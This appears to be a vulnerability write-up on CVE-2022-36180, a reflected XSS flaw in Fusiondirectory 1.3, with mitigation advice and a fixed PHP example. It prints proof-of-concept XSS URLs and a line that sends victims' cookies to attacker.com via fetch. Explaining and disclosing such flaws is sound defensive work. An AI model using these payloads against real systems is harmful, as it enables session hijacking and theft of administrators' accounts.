---
Fusiondirectory is a popular open-source web-based directory management solution, often used atop OpenLDAP. In September 2022, a serious security vulnerability — CVE-2022-36180 — was publicly disclosed. This issue affects version 1.3 and allows attackers to perform Cross Site Scripting (XSS) attacks against users by injecting malicious code into the message and plug parameters in the URL.
In this post, we'll walk through the vulnerability, demonstrate it with a proof of concept, and provide resources for mitigation.
What is CVE-2022-36180?
CVE-2022-36180 is a reflected XSS vulnerability in Fusiondirectory 1.3. By manipulating URL parameters, an attacker can inject arbitrary JavaScript code that runs in the victim's browser. The vulnerable parameters are message and plug, often used in:
- /fusiondirectory/index.php?message=[injection]
- /fusiondirectory/index.php?message=invalidparameter&plug=[injection]
- /fusiondirectory/index.php?signout=1&message=[injection]&plug=106
Whenever these parameters are rendered without proper escaping/sanitization, it opens the door for an XSS attack.
Why is this Dangerous?
If an attacker convinces an authenticated user (like an admin) to click on a malicious link — even unintentionally — their browser will execute the attacker’s script. This could:
Perform actions using the victim’s privileges
No special permissions are needed — just a crafted link and a user to click it.
Proof of Concept (PoC)
If the message parameter content gets injected into the page without sanitization, here’s a basic attack scenario:
https://example.com/fusiondirectory/index.php?message=<script>alert('XSS')</script>;
When visited, the browser will display an alert pop-up, demonstrating code execution.
Similarly, you can inject into the plug parameter
https://example.com/fusiondirectory/index.php?message=invalidparameter&plug=<script>alert('XSS')</script>;
Or chaining parameters during signout
https://example.com/fusiondirectory/index.php?signout=1&message=<img%20src=x%20onerror=alert('XSS-3')>&plug=106
Replace the alert with a call to your own server to exfiltrate cookies
https://example.com/fusiondirectory/index.php?message=<script>fetch('https://attacker.com/?c='+document.cookie)</script>;
If you inspect the PHP backend in Fusiondirectory 1.3, you may see code like
<?php
$message = $_GET['message'] ?? '';
echo "<div>$message</div>";
?>
If $message is not sanitized, arbitrary HTML and JavaScript pass straight to the browser.
Safer coding: *Always escape outputs!*
echo "<div>" . htmlspecialchars($message, ENT_QUOTES, 'UTF-8') . "</div>";
References and Resources
- Official CVE Record: CVE-2022-36180
Original Disclosure:
- huntr.dev GHSA-2rfx-rw2r-5fhv
- huntr.dev report
- Upstream Issue: Fusiondirectory Issue #8838
Educate your users about phishing links.
Checking your logs for suspicious requests to /fusiondirectory/index.php is a good idea. Attackers often test XSS with <script>alert(1)</script> or <img src=x onerror=alert(1)>.
Conclusion
CVE-2022-36180 highlights a classic — but still threatening — XSS bug in a critical admin tool. Even one unescaped parameter is all it takes for an attacker to compromise an organization. Always validate and escape user input, especially in security-sensitive applications.
Timeline
Published on: 11/22/2022 01:15:00 UTC
Last modified on: 07/10/2023 16:15:00 UTC